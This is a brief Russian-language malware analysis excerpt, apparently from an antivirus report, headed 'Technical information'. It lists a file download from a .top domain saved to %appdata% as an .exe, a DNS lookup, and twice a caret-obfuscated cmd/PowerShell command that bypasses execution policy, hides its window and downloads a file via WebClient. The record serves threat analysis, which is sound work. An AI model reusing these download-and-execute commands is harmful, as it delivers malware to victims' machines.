Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWE^rs^h^e^Ll^.^ex^E -E^Xe^cU^TIOnp^Ol^I^C^y ^by^P^aS^S -^nO^PrOFIlE -wiNdowS^Tyl^E ^H^IDDEN (neW-^Obje^c^t^ SYS^tem.nEt.webCliE^nT^).DOW^N^loA^DFI^le('http://dosehoop.to...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /c "pOWE^rs^h^e^Ll^.^ex^E -E^Xe^cU^TIOnp^Ol^I^C^y ^by^P^aS^S -^nO^PrOFIlE -wiNdowS^Tyl^E ^H^IDDEN (neW-^Obje^c^t^ SYS^tem.nEt.webCliE^nT^).DOW^N^loA^DFI^le('http://dosehoop.to...' (со скрытым окном)